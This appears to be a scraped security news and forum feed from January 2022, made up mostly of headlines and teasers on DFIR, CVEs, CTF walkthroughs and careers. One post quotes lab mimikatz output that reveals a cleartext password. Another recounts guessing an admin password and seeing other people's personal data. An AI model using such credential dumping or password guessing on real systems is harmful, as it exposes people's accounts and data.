    I have read many posts about EC Council not being good for any certification. But my question is if it's offered to me at a discounted price (99$) then it's good or still bad. Please note that this cert is being sponsored by my school, although it's not compulsory for me to join but I topped the merit list and they offered me to pay 99$ to get its voucher. So shall I go to it or simply deny it? submitted by /u/hardfire005 [link] [comments]  ( 2 min )
    Intro to Windows Registry artifacts with TryHackMe Windows Forensics Room.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
    How do you think accuracy and precision applies to DFIR?
    I stumbled across accuracy and precision and was wondering how forensic examiners think it applies to DFIR, if at all. Maybe software, artifacts, attribution? Thoughts? https://preview.redd.it/a3xvkvnl1ud81.png?width=1024&format=png&auto=webp&s=d1ff7da688bfb06abfdaea08136cb0924c92c2fc submitted by /u/greyyit [link] [comments]  ( 3 min )
    Recovering deleted/cached images (Mac)
    I have been trying to find ways to recover deleted images from a discord server, and found that all content is stored in some form onto its cache in "~/Library/Application Support/discord/cache". The result is something like this. There seem to be some ways to recover it on windows, however, is it possible on macOS? I have no idea what I am looking at here, so forgive me for ignorance. https://preview.redd.it/brl4u4s2qtd81.png?width=1832&format=png&auto=webp&s=c87beca7931e74351107f7eea57abe24711b073c submitted by /u/Nitrote [link] [comments]  ( 1 min )
    How can I access mmssms.db without rooting phone?
    Hi, I would like to recover some deleted SMS messages. I do not know, how to access the mmssms.db, when plugging my phone to my PC without actually rooting it. What are my best options? Also how far back in time do you think I could recover the texts? submitted by /u/prois99 [link] [comments]  ( 1 min )
    Alcatel GO Flip V access?
    No idea where else to ask. There’s an Alcatel Go Flip V that I need text message logs from for a court case. I used to use BitPim for this sort of thing, but that hasn’t had profiles updated for years. I hate to phrase this in such a phone-specific way, but this phone is killing me, and I’ve tried a whole lot: Does anyone know any way to get legible texts from an Alcatel GO Flip V? Or is there anywhere else I should ask? submitted by /u/hmmqzaz [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-25 Review
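    2021 Cryptography Application Technology White Paper by ourren; 2021 Network Detection and Response Report by ourren; 2021 Cyberspace Mapping Annual Report by ourren; Detection Dilemmas and Reflections Under the Trend Toward Fully Encrypted Traffic by ourren. For more of the latest articles, visit SecWiki  ( 2 min )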
  • Open

    RESTler: Stateful REST API fuzzing tool
    Article URL: https://github.com/microsoft/restler-fuzzer Comments URL: https://news.ycombinator.com/item?id=30073154 Points: 4 # Comments: 0  ( 6 min )
  • Open

    My CRTO course and exam review
    Motivation of The Journey Continue reading on Medium »  ( 4 min )
  • Open

    ClickJackingggg!!
    Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking… Continue reading on Medium »  ( 2 min )
  • Open

    Hack into Skynet —  Real World CTF (2022) walkthrough
    In this writeup, I’m sharing one of the potential methods to pwn a web challenge on Real world CTF 2022. All challenges built on top of real-world applications & due to the impact of COVID-19, The…  ( 5 min )
    Attacks on JSON Web Token (JWT)
    In part1 of the article, I introduced JSON web tokens that what is JWT and How they are made? I prefer to take a look at that before you go…  ( 8 min )
    How I ended up downloading a malware
    Hello folks!!! My brother and I were bored this weekend and decided to play a game, so he downloaded the game. Here’s the fascinating part…  ( 4 min )
    How I passed CEH (Practical) in my first attempt by Guru HariHaraun
    Hello guys! I’m Guru HariHaraun, 21 years old. In this blog, I will be sharing with you my secret strategy I followed to pass CEH…  ( 7 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability in 5 minutes just from reconnaissance. Found multiple vulnerabilities on a web application that used the…  ( 3 min )
    Hacking Microsoft Forms
    Since the growth of online learning during this pandemic, students and researchers have been on a hunt for hacks on Microsoft Forms which…  ( 2 min )
    Day 16, Web Reconnaissance Or Information Gathering — Part 1#100DaysofHacking
    Get all the writeups from Day 1 to 15, Click Here Or Click Here.  ( 5 min )
    How I Discovered Thousands of Open Databases on AWS
    My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto platforms, Startups during…  ( 9 min )
    Simple CTF- TryHackme
    CTF  ( 3 min )
    LAB Setup — ModSecurity || Apache as reverse Proxy || Generate& Install self signed SSL…
    A: Configure Apache as reverse proxy and the application [demo.testfire.net] should be accessible via local host entry through configured…  ( 7 min )
  • Open

    RWCTF 4th Desperate Cat Writeup
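    In Real World CTF 4th, I was honored to once again take part as a challenge author. I wrote a challenge called Desperate Cat, which tests getting a shell by writing a file into the Tomcat web directory under strict conditions.  ( 2 min )
    FreeBuf Morning Report | 1,862 data breaches recorded worldwide last year; Russian authorities arrest the leader of an international cybercrime group
    The Australian Securities and Investments Commission (ASIC) announced that it is working with five regtech companies to create a new platform intended to better handle information about listed companies.  ( 1 min )
    Attack Technique Analysis | Using Safe Mode to Break Through Security Product Defenses
    Sophos researchers recently discovered a new ransomware gang named AvosLocker. The attackers evade detection by exploiting the protection gap left because security products cannot run in Safe Mode, and use an exception configuration to keep remote control of the target.  ( 1 min )
    Building a web application firewall and traffic inspection with ModSecurity
    ModSecurity is an open-source, cross-platform web application firewall (WAF) engine for Apache, IIS and Nginx, developed by Trustwave's SpiderLabs.  ( 2 min )
    Obtaining Your Universal Token in AD FS
    Microsoft's AD FS (federated authentication) service is a cross-boundary identity and authentication service designed to let services outside the AD domain authenticate with AD domain accounts, enabling SSO (single sign-on) across multiple different entities or organizations.  ( 1 min )
    A Study of Intranet Proxy Tools and Detection Methods
    Tunneling is a way of transferring data between networks by using the infrastructure of an internetwork. The data (or payload) transferred through a tunnel can be frames or packets of a different protocol.  ( 1 min )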

  • Open

    What are Sock Puppets And How To Create One?
    Sock puppets are constantly engaging in different ways across social media trying to influence what we think and what we believe. So how to Continue reading on Medium »  ( 3 min )
    Analyze a Twitter query in 5 minutes
    As part of analyzing a competitor's communications or searching for information on social networks, it can be… Continue reading on Medium »  ( 2 min )
    Bundesservice Telekommunikation unmasked: this is the intelligence service behind it
    Looking for one cover agency and finding three. The simple tricks that can be used to expose German intelligence services. Continue reading on Medium »  ( 12 min )
    CyberSoc | Cyber Detective CTF Write Up — Life Online
    OSINT-focused CTF Challenges. OSINT in Twitter, Stego, Crypto and more Continue reading on Medium »  ( 3 min )
    OSINT Tools to Use
    OSINT tools: An expanding list Continue reading on Medium »  ( 14 min )
  • Open

    CVE-2022-0185 in Linux Kernel Can Allow Container Escape in Kubernetes
    Article URL: https://blog.aquasec.com/cve-2022-0185-linux-kernel-container-escape-in-kubernetes Comments URL: https://news.ycombinator.com/item?id=30064884 Points: 2 # Comments: 0  ( 4 min )
    CVE-2021-3998 and CVE-2021-3999 in glibc's realpath() and getcwd()
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/4 Comments URL: https://news.ycombinator.com/item?id=30057900 Points: 2 # Comments: 0  ( 5 min )
    CVE-2021-3996 and CVE-2021-3995 in util-Linux's libmount
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/2 Comments URL: https://news.ycombinator.com/item?id=30056823 Points: 3 # Comments: 0  ( 3 min )
  • Open

    Cobalt Strike, a Defender’s Guide - Part 2
    submitted by /u/dmchell [link] [comments]
  • Open

    Using Twitter to notify careless developers — the unorthodox way (Or, how you could use GitHub to compromise 9.5K Twitter accounts without “hacking”)
    submitted by /u/sp00kyphiss [link] [comments]  ( 1 min )
    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    submitted by /u/jrozner [link] [comments]
    WordPress 5.8.2 Stored XSS Vulnerability
    submitted by /u/monoimpact [link] [comments]
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]
    How BRATA is monitoring your bank account | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    TypeScript scenario-based web application Fuzzing Framework, supports genetic algorithm and running on CI
    submitted by /u/hi120ki [link] [comments]
    Private Network Access: introducing preflights - Chrome Developers
    submitted by /u/rhaidiz [link] [comments]
    Qiling Sandbox Escape
    submitted by /u/ly4k_ [link] [comments]
    CVE-2022-0185 – What does the newest kernel exploit mean for Kubernetes
    submitted by /u/gemyougym [link] [comments]  ( 1 min )
  • Open

    HOW I hacked thousand of subdomains
    Hello everyone Continue reading on Medium »  ( 3 min )
    Hack into Skynet —  Real World CTF (2022) walkthrough
    Continue reading on InfoSec Write-ups »  ( 4 min )
    Journey for finding the CSRF Bug lead to the finding of the 403 Forbidden error
    Hello myself Manan Aggarwal and this is my First Blog Post that while I was finding the CSRF Bug that Lead to the finding of the 403… Continue reading on Medium »  ( 2 min )
    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec! Continue reading on InfoSec Write-ups »  ( 2 min )
    deBridge launches bug bounty on ImmuneFi
    This initiative is being funded by deBridge in order to improve network security and reliability for the network’s global community. Continue reading on Medium »  ( 2 min )
    Security Explained: Penetration Testing vs Bug Bounties
    In the world of application and network cybersecurity, you may have asked the question: what is penetration testing? Or what are bug… Continue reading on Medium »  ( 3 min )
  • Open

    Why are serializing bugs not a thing? Does code execution only occur during deserializing data only?
    Noticed all the fanfare around deserializing but not the opposite which is serializing a string and getting code execution from that. submitted by /u/Academic-Discount252 [link] [comments]  ( 2 min )
    Is authenticating by URL secure?
    The idea is to have a desktop .NET app that authenticates a user by having a built-in browser that takes you to an SSO page, and only allows access to the app if you successfully arrive at a URL which is only accessible if you were able to successfully log in. Is this a secure method? I’m worried if there is some way of faking a URL. Is there some other alternative similar to this that is more secure, maybe something to do with certificates? I’m very new to this kind of stuff so any help is appreciated. submitted by /u/Sloathe [link] [comments]  ( 1 min )
    Looking to make a VLAN on my Home Network to protect a New Machine
    Two of my devices have had strange occurrences over the last couple of months. I am sure it’s fine but it has been enough to where I don’t trust them. I have been building a desktop and I am about to finish. My question is how to best keep my new desktop with a fresh install of Windows 10 safe from any possible malware lingering on my other two machines on the network. Would a VLAN be the way to go on something like this? Like set up a VLAN specifically for my desktop. I am new at this stuff so I apologize in advance for any annoying assumptions or questions. Thank you so much for your consideration. EDIT: I also have an unmanaged switch and a Netgear wifi extender/access point at my disposal. My ISP is Xfinity. EDIT: VLAN needs a managed switch so it’s a no go. submitted by /u/Zpointe [link] [comments]  ( 1 min )
    Could other logging systems have similar flaws to log4shell if fuzzed properly?
    The problem with log4shell is it was overblown and very buzzwordy when it relied on a known flaw from years ago called JNDI injection, but I’m thinking bigger than JNDI and Java. Could other programming languages like PHP, Python, Ruby, ASPX/.NET Framework have similar flaws to force their logging system to execute a log as code? Most logging systems don’t have fancy features like JNDI, LDAP etc., so I’m not sure what you could leverage to force code to be executed. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    How do I get out?
    Hi all, bit of an unusual one for you - I really want out of cybersecurity. I've got about 3 years of experience in netsec, mostly doing app and infrastructure security testing and honestly I hate it. Every project is a brand new technology I've got little experience in and I always end up feeling like I couldn't possibly have tested it 100% properly. I have major anxiety and panic issues and I'm finding the entire thing just too stressful and have completely burnt out in a few short years. So my question is: Has anyone successfully transitioned into another IT space from cyber security? I would love to just be a sysadmin and only have a single network and set of technologies to contend with, so I can feel like I'll truly master them and become properly proficient. The problem is I think I'll have a lot of stigma going into interviews as it will be very obvious I couldn't handle netsec and am looking for an out, especially considering as I'm on £50k and will likely need to take a cut down to 25k-35k to get into a role like this. So any advice anyone can offer for how to approach this situation? Do I need to go get an entirely different set of certs before I'll even be considered? signed, a very burnt out pentester submitted by /u/mekkr_ [link] [comments]  ( 8 min )
    Interview technical test
    Hey guys, I'm interviewing for a jr pen tester position and was asked for a technical test that consists in checking the security of an IP target that is hosted in the AWS cloud. I can use whatever tool I want as long as I find issues in the IP target and recommend ways to solve the issue. I have three days to do this test, and I'm looking to learn whatever I have to learn to take this next step that will change my life forever, but I have no idea how to start. Can you guys point me in the right direction? What resources do I have to start learning that? Thank you, and sorry if this doesn't fall in the scope of the subreddit. submitted by /u/Kelvien [link] [comments]  ( 2 min )
    A HUGE untapped attack surface for auth bypassing: Arbitrary Server Side Forwards also known as Unvalidated Forwards or Dangerous Forwards. It’s basically SSRF-Lite.
    Barely any blogs or posts cover this stuff in depth enough for my liking, and some of the biggest auth bypasses in Java apps stem from their requestdispatch forward feature, which allows you to access internal authenticated APIs and endpoints as a non-logged-in session. What I’m wondering is if there’s anything analogous to this in other popular languages like PHP, Ruby on Rails, Django etc. to do the same thing, and if not, is there any research regarding auth bypasses for open redirects, which are more client-side based and I don’t believe they can be used for auth bypasses, since forwards are internal/server-sided and keep session and parameter data intact, whereas redirects are client-sided and initialize fresh session data, so they seem less useful than forwards. The only time I’ve seen an open redirect possibly bypass authentication is in combination with an SSRF or some feature where the web app follows the URL and then follows that URL’s redirect internally. Would love fellow netsec peeps’ insight on this under-researched phenomenon. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Interview Question
    Hi guys, I have an interview for Intern SOC analyst in one of the reputed organizations and the interview will consist of some technical lab as well. Any idea what the lab questions can be? How can I prepare for the lab examination? submitted by /u/Either_Attempt_9108 [link] [comments]  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec!  ( 2 min )
  • Open

    Movies and series
    submitted by /u/omnifage [link] [comments]
    Dataset and model of the universe
    Gaia is a European space mission providing astrometry, photometry, and spectroscopy of more than 1000 million stars in the Milky Way. Also data for significant samples of extragalactic and Solar system objects is made available. The Gaia Archive contains deduced positions, parallaxes, proper motions, radial velocities, and brightnesses. Complementary information on multiplicity, photometric variability, and astrophysical parameters is provided for a large fraction of sources. http://cdn.gea.esac.esa.int/ Browse to https://gea.esac.esa.int/ for info. submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    Article URL: https://www.yahooinc.com/paranoids/paranoids-vulnerability-research-printerlogic-issues-security-alert/ Comments URL: https://news.ycombinator.com/item?id=30060422 Points: 2 # Comments: 0  ( 8 min )
    F5 fixes high-risk Nginx Controller vulnerability in January patch rollout
    Article URL: https://portswigger.net/daily-swig/f5-fixes-high-risk-nginx-controller-vulnerability-in-january-patch-rollout Comments URL: https://news.ycombinator.com/item?id=30060420 Points: 2 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-01-24 Review
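    A First Look at Prototype Pollution in Node.js by ourren; 2021 Attack Technique Trends Report by ourren; SecWiki Weekly (Issue 412) by ourren; Research on Intranet Proxy Tools and Detection Methods by xiahao90; The Hash Game of Hunting Samples by Avenger. For more of the latest articles, visit SecWiki  ( 2 min )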
  • Open

    Exfiltration
    I'd like to start a brief discussion that might be a great learning opportunity for a lot of newbie forensic investigators - From a forensics standpoint, how would you tell if a file was exfiltrated? For this scenario, I'm thinking ransomware gang exfiltrates data before encrypting and is using a cloud based solution for storage. submitted by /u/DeadBirdRugby [link] [comments]  ( 3 min )
    Does anyone have experience with /media/0/.RecycleBin? (Android)
    If a file has a creation time and has this location, does this mean the creation time is the time the file was put there? And therefore "deleted"? submitted by /u/DHZX [link] [comments]  ( 1 min )
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

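    The Past and Present of Security Analytics
    How has security analytics changed over the past ten years? This article discusses the evolution and value of security analytics.  ( 1 min )
    Corporate email accounts at thousands of industrial organizations stolen and abused to launch further attacks
    Attackers abuse the trust of corporate mailbox contacts to launch attacks, spreading from one industrial enterprise to another.  ( 1 min )
    At the company they just want to keep a low profile, but their skills won't allow it
    Tophant's (斗象科技) first internal attack-and-defense exercise concluded successfully.
    Tophant (斗象科技) named among the "Top 10 in Security Services" of 2021's outstanding cybersecurity companies
    Successfully selected and awarded the "Top 10 in Security Services" title
    2021 National Mobile Application Security Observation Report
    At present, China's cybersecurity situation remains severe; in the big-data era, cybersecurity faces hazards such as virus threats, online fraud, hacker intrusion, and information loss.  ( 1 min )
    2021 Business Risk Control Insight Report officially released
    An in-depth analysis of typical 2021 fraud scenarios and cases along three dimensions: business security, content security, and cross-border security.
    FreeBuf Morning Report | Russia's central bank proposes banning cryptocurrency; hackers implant malware in UEFI firmware
    A new survey shows that the number of cyberattacks against companies worldwide has increased by 15% over the past three years.  ( 1 min )
    Security building and security operations under cloud-native architecture, seen through major vulnerability emergency response (Part 1)
    A summary of emergency response to major vulnerabilities and security-operations-driven security capability building  ( 1 min )
    A Brief Discussion of PHP Pseudo-Protocols
    PHP has many wrapper protocols; the most common are the file, php, data, zip, and phar protocols, among others.  ( 1 min )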
  • Open

    Forge HackTheBox Walkthrough
    Introduction Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and The post Forge HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    No length on password
    Imgur disclosed a bug submitted by blackfly_: https://hackerone.com/reports/1411363 - Bounty: $250

  • Open

    mimikatz LogonPasswords and usernames with dollar sign ($) at the end
    I have a lab that I'm testing mimikatz on. Some of the usernames are dumped as "hostname$" What does that mean? hostname being the actual host name of the test server being in this case "labserver"; so it will be something like: [...] kerberos : * Username : labserver$ * Domain : lab.corp * Password : P@ssW0rd!! submitted by /u/ak_z [link] [comments]  ( 1 min )
    [Malware] I've started studying malware and more specifically backdoors, but something seems to not make any sense.
    Hey, I've recently started to study how backdoors work and are used / made. But I've noticed that every backdoor I've come across follows this principle: A client runs on the target and tries to connect to the attacker to give him access. The server runs on the attacker and waits for a connection from the target. Shouldn't this be the opposite so the attacker can gain access whenever he wants? Isn't the purpose of a backdoor to be an easy way for the attacker to come back later? If so, doesn't it defeat it? Am I misunderstanding something? I hope someone can help me clarify this. PS: I'm not asking this to commit any sort of crime, I'm genuinely interested in cybersecurity research and that's why I'm asking this question. submitted by /u/fleurdelys- [link] [comments]  ( 2 min )
    Which do you think is the higher tier in cyber security?
    Soc analyst or security analyst? submitted by /u/lowkiwatchingyou [link] [comments]  ( 1 min )
    Weak password found on "accident"
    Backstory for question: I'm currently in the process of getting a job and I was sent a link (via email) to a psychological test which required a username and password to login, the user was already typed for me (sent as parameter on the url) and the password was sent on the email. At first I didn't read the full email so I entered the link and when I saw I needed a password, I thought that there must've been a mistake, so I typed a "random" password to see what would happen (I typed the same user as the pass) and I was able to log in. I was very confused as I was greeted with a page full of information regarding the account I was logged in to and as I explored further I was able to see personal information regarding other people that have done the quiz. At this point I realized that I wasn't supposed to be able to read this info so I logged out and tried another password (I was thinking that maybe the account accepted everything you typed) but no, I got a "wrong password" text. I read the email again, this time I saw that the password I was supposed to use was always there, I try it and I log in successfully, but now it doesn't redirect me to the admin panel, it takes me to the psych test I'm supposed to be doing. As a NetSec Student, I know that I should let the company know about this weak password, but I don't know how to do it without it looking like I was on purpose trying to log in with another password different than the one provided via email and maybe get in trouble with the company I'm applying to. Worded as a question: What is the best way to let a company know that they have a vulnerability on an account? TL;DR: Got sent user and pass for an account, tried same user as pass instead (because I'm dumb and didn't read full email) and logged in as admin. Want to disclose this to the company but don't want to get in trouble. submitted by /u/Emacholo [link] [comments]  ( 3 min )
    Advice on a DAST Tool to Handle Single Page Apps
    Hi everyone, I’m currently looking for a DAST scanner that works well with single page applications (I’m using Ember.js with a couple of APIs behind it). For example, every tool I’ve tried has not been able to effectively test for XSS, as they can’t link injection points from API calls back to the rendered DOM on the monolithic front end. Any tools, advice, etc. would be so greatly appreciated. Also, please note that I already utilize SCA and SAST, and will be moving to IAST in the future – this is solely about DAST. Cost is not a concern, just effectiveness. submitted by /u/shadowcorp [link] [comments]  ( 1 min )
    Jumping from Application Developer/DevOps to Application Security Engineer
    Hey everyone, I'm 27, relatively new into tech (4 years of experience). I'm a full stack developer, experienced with DevOps and CI/CD pipelines, and I have a CISSP. My goal is to ultimately become a jack of all trades architect. I'm potentially getting an opportunity to move into an application security engineering role that has significantly less development, and a lot more threat modeling, security architecture, pen testing, etc. I've never done those things, I've only studied them. Is it worth it to switch into a much more high level security oriented position? Would I be abandoning my primary skill set? Or is there a way to combine the 2 down the line? I'd love to hear your experience, your advice, and how your own career grew. submitted by /u/pyscho94 [link] [comments]  ( 1 min )
    Strange unknown local device found when running Wireshark and filtering via ARP
    Hi, I apologize in advance if this does not fit this subreddit. I was running Wireshark on my home network and was filtering by ARP to test some things. But in the process I found a strange device with a Facebook MAC address. https://imgur.com/a/HbNuWdE (note, I removed the MAC for the router) It was only the router asking for IP and not vice versa. Why would the router ask for it in the first place? Any info/explanation would be appreciated. submitted by /u/Wattcat [link] [comments]  ( 1 min )
    Career pivot!
    Looking to pivot to the cyber security world. Studying for a sec + cert, have a secret clearance, and got a cyber cert from MIT. Have 2 years of DOD consulting experience. And an engineering degree. Looking at roles like “cybersecurity engineer” and cybersecurity analyst. What kind of compensation can I expect as a government contractor with the above resume? I’m looking to get into the RMF/Policy/Vulnerability Assessment world. I am trying to create a future path for myself down the road. submitted by /u/tbrady1001 [link] [comments]  ( 1 min )
    Making the jump from IT Support to Security - Advice needed
    Hello, Looking to move into IT Security from IT Support. I currently have 15+ years in IT Support (1st, 2nd, 3rd line IT support). Unfortunately I'm pretty clueless on progression steps and the certs needed to climb up the Security ladder. I don't like the idea of CISSP as that appears to be geared towards management, but like the look of Security Analysis/Defensive/Offensive. With my IT background what certs should I look at? I was thinking GCIH as a start? Also would 2 years as a Security Analyst with a couple of certs be enough to progress in a new company? Or would 5 years (for example) be the minimum I would realistically need? Any advice/insight would be appreciated and apologies if this is the wrong forum. submitted by /u/ZoidbergsMinions [link] [comments]  ( 5 min )
    Security for Personal IT Tutor
    Hi, I’m getting increasing requests from friends of friends of family to do some basic IT support work for them. With close family members I have been entrusted with access to their password managers and unattended remote access, which is really useful to be able to help with things they can’t do themselves or when they’re away from their devices - all the credentials for this are kept in a totally separate password manager from my personal accounts. However I recognise that this is big security risk, and if I’m going to be working with people outside my family, I want to avoid exposing them to unnecessary risk without severely limiting my ability to help them. What should I be conscious of in setting up a remote access solution for this purpose? Are there any good ways that clients can share passwords or access to specific accounts without me having access to their entire password manager? submitted by /u/marquitanavin [link] [comments]  ( 1 min )
    Temporal Scoring - CVSS How to Input
    So right now I am using CVSS v3.0 base scoring to calculate severity of findings from scanning tools like Tenable.sc, snyk, and some other tools. I want to go farther and factor the CVSS Temporal score into the severity so I can prioritize better... question is how do I do that when I have 1,000+ findings and can't do it manually? Where can I get a feed or service or point in time data to get that? NVD does not provide it. Thank you! submitted by /u/ThrowThrowAway789 [link] [comments]  ( 1 min )
  • Open

    A new shellcode injection methodology
    submitted by /u/Idov31 [link] [comments]
    Binary-only fuzzing with python, Qemu and LibAFL
    submitted by /u/domenukk [link] [comments]
    Doing a uni project on pen testing and appreciated this article for help writing up an information disclosure vulnerability. Thought some of you might appreciate it too.
    submitted by /u/PlatonicDogLover93 [link] [comments]  ( 1 min )
    Backdoor Found in Themes and Plugins from AccessPress Themes (CVE-2021-24867)
    submitted by /u/ScottContini [link] [comments]
  • Open

    The Threat Landscape and Attribution
    Over the years, changes in the threat landscape have made attribution more difficult. Attribution has always been challenging, but has been and can continue to be eased through visibility. That is, if your view into an event or campaign is limited to resources such as malware samples pulled from public repositories, then attribution can be challenging. Even adding information regarding infrastructure extracted from the sample configs can still give a somewhat limited view. However, as visibility is expanded to include data from intrusions and incidents, attribution becomes clearer and more granular. I ran across A Complex Threat Landscape Muddles Attribution recently and found it to be a fascinating, insightful read, one that anyone involved in threat intelligence, even peripherally, shoul…  ( 8 min )
  • Open

    Wildfire videos - wireless research UCSD
    The High Performance Wireless Research and Education Network (HPWREN), a University of California San Diego partnership project led by the San Diego Supercomputer Center and the Scripps Institution of Oceanography's Institute of Geophysics and Planetary Physics, supports Internet-data applications in the research, education, and public safety realms. HPWREN functions as a collaborative, Internet-connected cyberinfrastructure. The project supports a high-bandwidth wireless backbone and access data network in San Diego, Riverside, and Imperial counties in areas that are typically not well-served by other technologies to reach the Internet. This includes backbone locations, typically sited on mountain tops, to connect often hard-to-reach areas in the remote Southern California back country. http://hpwren.ucsd.edu/HWB/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    Indiana Department of Homeland Security Fire Regulation Variance Requests
    submitted by /u/Typographical_Terror [link] [comments]  ( 1 min )
    Books on Theorists of Education [PT-BR]
    submitted by /u/afmachado [link] [comments]
  • Open

    Tracing Tor router connections within a host
    Hi there, I'm analysing a memory dump from an infected system that is running a cryptominer and connecting to the mining server through a Tor router. I know the processes of the miner and the tor router it installed on the system. Is there a way to show the miner handing over the IP of the actual mining server to the Tor router? The firewall of course just sees the connection to the next Tor router. submitted by /u/NazgulNr5 [link] [comments]  ( 1 min )
    What are some jobs that you can do with experience in computer forensics?
    I have a very close friend who has been doing computer forensics for well over 10 years and has experience with networking technology too. They've been working for local law enforcement all this time and has had to deal with "very bad sexual content" for quite a long time and it's really starting to eat away at their mental health. They really would like a job change. They are willing to work in law enforcement as long as the work doesn't involve kids. They make good money at the police department they work at now so a part of the equation is a paycheck. They are hoping to work at this job for the rest of their career. Teaching would also be an option. Thanks for any answers. submitted by /u/Onece_in_a_life_time [link] [comments]  ( 3 min )
  • Open

    Process Ghosting Attack
    Introduction Gabriel Landau released a post on Elastic Security here which talks about a technique through which antivirus evasion was found to be possible. The The post Process Ghosting Attack appeared first on Hacking Articles.  ( 8 min )
    Corrosion: 2 VulnHub Walkthrough
    Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine. We can download the lab from here. This lab is designed for experienced CTF players who The post Corrosion: 2 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Intelligence HacktheBox Walkthrough
    Introduction Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket The post Intelligence HacktheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    My Pentest Log -4-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Creating easy proof-of-concept scripts with Python and Curl.
    Hello Hunters! Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - XSS (CROSS SITE SCRIPTING) LAB SOLUTIONS
    Cross Site Scripting, as a result of malicious commands that the attacker runs in a web application… Continue reading on Medium »  ( 32 min )
    Fuzzing is always fun..!!
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    Setting up a Free VPS for Bug Bounty & More
    Finding Bugs can be Time consuming and as for day-to-day life, you are not sitting on your one computer all day unless you are a… Continue reading on Medium »  ( 3 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability just from reconnaissance. Found multiple vulnerabilities on a web application that used the Symfony web… Continue reading on Medium »  ( 2 min )
  • Open

    Show HN: TypeScript Scenario-Based Web Application Fuzzing Framework
    Article URL: https://github.com/shfz/shfz Comments URL: https://news.ycombinator.com/item?id=30047196 Points: 1 # Comments: 0  ( 4 min )
  • Open

    SecWiki News 2022-01-23 Review
    No news updates today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

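    Is your home Wi-Fi secure?
    Is your home Wi-Fi secure? Could someone freeload on your network, or could a hacker log in and steal data?  ( 1 min )
    Common in-domain operations, condensed edition
    Once we have penetrated an internal network, we need to quickly determine the environment we are in and decide what to do next. This article gives a very concise introduction to these operations.  ( 1 min )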
  • Open

    Intigriti’s January XSS challenge By TheRealBrenu
    First challenge for 2022 is here by TheRealBrenu. This one is a good example of javascript source maps, which I was unfamiliar at first… Continue reading on Medium »  ( 3 min )
  • Open

    OSINT Double Trouble
    It’s a new year, and that means new OSINT Challenges to solve. This time around, I’ll be solving 2 challenges courtesy of Twitter’s… Continue reading on Medium »  ( 4 min )

  • Open

    I'm working in security and stuck on whether I should learn Web Development
    Hi Everyone, I currently work in Cyber security (Cryptography specialist) for a large organization. However, I have minimal coding experience. I would like to start the Odin Project but I'm not sure if I should invest all that time in learning web dev or continuing a path in security with something like a CISSP for more security knowledge. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know it might halt my security knowledge progression and I know I can't balance learning both right now. Will having both skills be better than just having one? If anyone has another suggestion that would be better I am open to that as well. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know I have a lot to learn in either path I choose. Thank you in advance. submitted by /u/Early_Ad_1861 [link] [comments]  ( 3 min )
    Backdoor payloads in image files: is this a thing?
    If I open an image in gmail (I think it opens through their viewer), can the payload run? Should I be concerned? Is just viewing it sufficient or would I have to download it? submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    Does anyone know what these photos/files are from the Brave browser folder?
    There were also some manifest.json's that had information like ""name":"Brave NTP sponsored images"", "Brave NTP sponsored images", "Tezos", "Taxbit" in them. Are these preloaded files for ads for a cryptocurrency/NFT manager that's placed somewhere in Brave intentionally? They were listed in a folder that looked like gibberish: "ghjifhoinncdowgrhioybqpasjndavbaoba" as an example. https://imgur.com/a/zozye1B I don't have to worry about some kind of "secret" cryptominer like Norton recently added to their software right? (I hope that this is the case and it's just files for ads). submitted by /u/nekohideyoshi [link] [comments]  ( 1 min )
    ISO 27001 Lead Auditor Certification
    Hey everyone. So I’m planning on doing the ISO 27001 LA certificate and came across it being offered by multiple certification body such as TUV, BSI and PECB. Can anyone tell me what the difference is between the certification bodies as I see a drastic price difference. Thanks in advance. submitted by /u/reeds1164 [link] [comments]  ( 1 min )
    What is the best entry level Linux certification?
    Hey everyone! Thank you for stopping by my post. I was wondering what is the best entry level Linux certification. I understand that the Linux + and Lpic-1 are no longer are a 1 for 2 package. Then everything I read online says don’t go for either of these and look into getting a red hat certification. I am going down the security engineer road and just need to get much deeper into Linux than I currently am. What are your recommendations and thoughts on Linux certifications? submitted by /u/RedNeckHutch [link] [comments]  ( 3 min )
    What can work computers/IT have access to?
